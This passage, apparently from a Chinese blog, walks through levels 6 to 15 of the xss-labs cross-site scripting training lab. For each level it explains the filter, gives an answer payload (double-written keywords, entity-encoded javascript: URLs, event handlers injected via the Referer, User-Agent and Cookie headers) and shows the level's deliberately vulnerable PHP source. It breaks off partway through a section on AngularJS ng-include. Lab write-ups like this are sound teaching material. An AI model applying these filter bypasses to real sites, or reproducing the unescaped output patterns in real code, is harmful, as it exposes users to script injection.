class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<script"</span>,<span class="string">"<scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level6.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str6</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level6.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str6</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 7</p> <p>本题以删除的方式过滤了href和script,可以使用双写绕过</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154250121.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154250121.png" alt="image-20240202154250121" ></a></p> <p><strong>答案:<code>"><a HRHREFEF="javascrscriptipt:alert(1)">1</a>//</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> =<span class="title function_ invoke__">strtolower</span>( <span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"script"</span>,<span class="string">""</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">""</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">""</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">""</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">""</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level7.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str6</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level7.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str6</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 8</p> <p>本题以添加下划线和html实体编码的形式绕过了href 、<> 、script 、"等字符,我们可以采用HTML实体编码+URL编码的形式在URL中直接写入,也可以在input标签内输入HTML实体编码。input标签也会默认对Unicode进行解码,所以本题可使用编码方式绕过。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154853561.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154853561.png" alt="image-20240202154853561" ></a></p> <p>相关网站:</p> <p><a class="link" href="https://config.net.cn/tools/HtmlEncode.html" >在线Html实体编码解码<i class="fas fa-external-link-alt"></i></a></p> <p><a class="link" href="http://www.esjson.com/urlEncode.html" >在线url网址编码解码<i class="fas fa-external-link-alt"></i></a></p> <p><a class="link" href="http://www.esjson.com/unicodeEncode.html" >在线Unicode编码转换工具)<i class="fas fa-external-link-alt"></i></a></p> <p><strong>答案:<code>javaScript:alert(1)</code></strong></p> <p>即:javascript:alert(1) #HTML实体编码->URL编码</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"script"</span>,<span class="string">"scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="variable">$str7</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'"'</span>,<span class="string">'&quot'</span>,<span class="variable">$str6</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level8.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=添加友情链接 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="'</span>.<span class="variable">$str7</span>.<span class="string">'">友情链接</a></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 9</p> <p>本题相较Level 8新增了网址合法性检测,经测试只需带有<a class="link" href="http://xn--zlr2ki56c6eedn6choa/" >http://即可通过检测<i class="fas fa-external-link-alt"></i></a>,可以将alert()内的字符改成http://,也可以在文末添加并使用注释符进行注释。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155310700.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155310700.png" alt="image-20240202155310700" ></a></p> <p><strong>答案:<code>javaScript:alert('http://')</code></strong></p> <p>即:javascript:alert(‘http://’)</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"script"</span>,<span class="string">"scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="variable">$str7</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'"'</span>,<span class="string">'&quot'</span>,<span class="variable">$str6</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level9.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=添加友情链接 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="literal">false</span>===<span class="title function_ invoke__">strpos</span>(<span class="variable">$str7</span>,<span class="string">'http://'</span>))</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>'</span>;</span><br><span class="line"> }</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="'</span>.<span class="variable">$str7</span>.<span class="string">'">友情链接</a></center>'</span>;</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 10</p> <p>测试第一个标签处,发现全都被过滤</p> <p><a href="https://img-blog.csdnimg.cn/cac51a8eb6fd47de8782e2b57d225cf8.png"><img lazyload alt="image" data-src="https://img-blog.csdnimg.cn/cac51a8eb6fd47de8782e2b57d225cf8.png" alt="img" ></a></p> <p>只能从源代码中的三个hidden元素入手,进行传值测试后发现t_sort有回显(GET),其余两个猜测为POST型</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155934507.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155934507.png" alt="image-20240202155934507" ></a></p> <p><strong>答案:<code>?t_sort=" onfocus=javascript:alert() type="text//</code></strong> ,因为此处输入框被隐藏,需要添加type=“text”,或者在控制台内修改此处的hidden为button等。</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str11</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level10.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 11</p> <p>查看网页源代码发现有四个hidden,分别尝试传值发现t_sort有回显,但几乎所有方法都被过滤,猜测t_ref为Referer头</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135104746.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135104746.png" alt="image-20240204135104746" ></a></p> <p>BP抓包向Referer头填充数值1即可发现回显在t_ref内,可以在Referer头内构造Payload,相应包正确后在抓到的包内添加Referer头并放包即可。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135754206.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135754206.png" alt="image-20240204135754206" ></a></p> <p><strong>答案:<code>Referer: " onclick="alert(1)" type="true</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><!DOCTYPE html><!--STATUS OK--><html></span><br><span class="line"><head></span><br><span class="line"><meta http-equiv=<span class="string">"content-type"</span> content=<span class="string">"text/html;charset=utf-8"</span>></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level12.php?keyword=good job!"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level11</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><h1 align=center>欢迎来到level11</h1></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str00</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str11</span>=<span class="variable">$_SERVER</span>[<span class="string">'HTTP_REFERER'</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str00</span>).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_ref" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level11.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 12</p> <p>与11题原理相同,注入点在UA头</p> <p><strong>答案:<code>User-Agent: " onclick="alert(1)" type="true</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><!DOCTYPE html><!--STATUS OK--><html></span><br><span class="line"><head></span><br><span class="line"><meta http-equiv=<span class="string">"content-type"</span> content=<span class="string">"text/html;charset=utf-8"</span>></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level13.php?keyword=good job!"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level12</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><h1 align=center>欢迎来到level12</h1></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str00</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str11</span>=<span class="variable">$_SERVER</span>[<span class="string">'HTTP_USER_AGENT'</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str00</span>).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_ua" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level12.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 13</p> <p>原理与11题一样,注入点在Cookie,注意要触发cookie</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140248710.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140248710.png" alt="image-20240204140248710" ></a></p> <p><strong>答案:<code>Cookie: user=" onclick="alert(1)" type="true</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><!DOCTYPE html><!--STATUS OK--><html></span><br><span class="line"><head></span><br><span class="line"><meta http-equiv=<span class="string">"content-type"</span> content=<span class="string">"text/html;charset=utf-8"</span>></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level14.php"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level13</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><h1 align=center>欢迎来到level13</h1></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">setcookie</span>(<span class="string">"user"</span>, <span class="string">"call me maybe?"</span>, <span class="title function_ invoke__">time</span>()+<span class="number">3600</span>);</span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str00</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str11</span>=<span class="variable">$_COOKIE</span>[<span class="string">"user"</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str00</span>).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_cook" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level13.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 14</p> <p>本题环境出现问题,略(Windows服务器下无法复现)</p> </li> <li> <p>Level 15</p> <p>本题考查ng-include函数的使用</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140554202.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140554202.png" alt="image-20240204140554202" ></a></p> <p><strong>答案:<code>src='level1.php?name=<script>alert(1)</script>'</code></strong></p> <ul> <li> <p><code>ng-include</code>是AngularJS框架中的一个指令(directive)。</p> <p><code>ng-include</code>用于在AngularJS应用中包含外部的HTML文件或其他AngularJS模板。<strong>引入AngularJS库:</strong> 确保在你的HTML文件中引入了AngularJS库。</p> <ol> <li> <pre><code class="language-html"><script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.8.0/angular.min.js"></script> XML2. **创建AngularJS应用:** 在HTML文件中定义一个AngularJS应用。 ```html <div ng-app="myApp"> <!-- 应用内容将在这里 --> </div> <figure class="highlight 